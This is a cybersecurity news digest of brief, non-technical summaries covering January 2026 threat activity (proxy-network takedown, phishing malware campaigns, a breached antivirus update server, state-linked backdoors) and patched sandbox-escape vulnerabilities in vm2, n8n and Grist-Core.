News
-
Google disrupts IPIDEA residential proxy network linked to malware
Google Threat Intelligence Group disrupted IPIDEA this week, taking down domains and infrastructure tied to a residential proxy network promoted to 6.7 million users. The action targeted trojanized apps and embedded SDKs that turned devices into proxies.
-
Investigation finds 175,000 publicly accessible Ollama hosts across 130 countries
A SentinelOne Labs analysis found 175,000 publicly accessible Ollama hosts in 130 countries, many exposing tool calling capabilities and operating outside standard platform guardrails, raising governance and security concerns for edge LLM deployments.
-
NIST center issues RFI seeking input on security for autonomous AI agents
A Request for Information from NIST’s CAISI asked for input on secure practices for autonomous AI agents on Jan. 8, focusing on novel risks, assessment methods, and deployment constraints as agencies push toward operational standards.
-
TA584 adopts Tsundere Bot and XWorm in expanded initial access campaign
TA584 is using Tsundere Bot and XWorm in phishing campaigns that tripled in late 2025. The chain uses geofenced URLs, redirect systems, CAPTCHA and PowerShell in memory loaders that complicate detection.
-
eScan update server breached to deliver malicious update on January 20 2026
An eScan update server was breached on January 20 2026 and pushed a malicious update to a subset of customers. Morphisec’s security bulletin details the modified updater and final backdoor payload.
-
Critical vm2 sandbox escape CVE-2026-22709 allows arbitrary code execution
A critical sandbox escape in the vm2 Node.js library, tracked as CVE-2026-22709 and rated CVSS 9.8, lets attackers run code on host systems. Users should update to vm2 3.10.3.
-
Two n8n sandbox escape flaws allow remote code execution
JFrog Security Research disclosed two eval injection flaws in n8n that can bypass sandboxes and allow remote code execution. One is rated CVSS 9.9. Users are advised to update affected versions.
-
Mustang Panda deploys updated COOLCLIENT backdoor to steal endpoint data
An updated COOLCLIENT backdoor linked to Mustang Panda was used in 2025 to steal keystrokes, browser credentials and files from government endpoints across Myanmar, Mongolia, Malaysia and Russia, according to a technical analysis by Kaspersky.
-
Cellbreak Pyodide sandbox escape in Grist‑Core allows remote code execution
A Pyodide sandbox escape in Grist‑Core, CVE-2026-24002, can enable remote code execution and host runtime JavaScript. The flaw was fixed in version 1.7.9 on January 9, 2026. Update or set the sandbox to gvisor.
-
PeckBirdy JScript framework used by China-aligned actors to target gambling and government sites
A JScript C2 framework called PeckBirdy has been used since 2023 to compromise gambling sites and Asian government and private organizations. The framework runs across browsers and common binaries and delivers modular backdoors including HOLODONUT and MKDOOR.
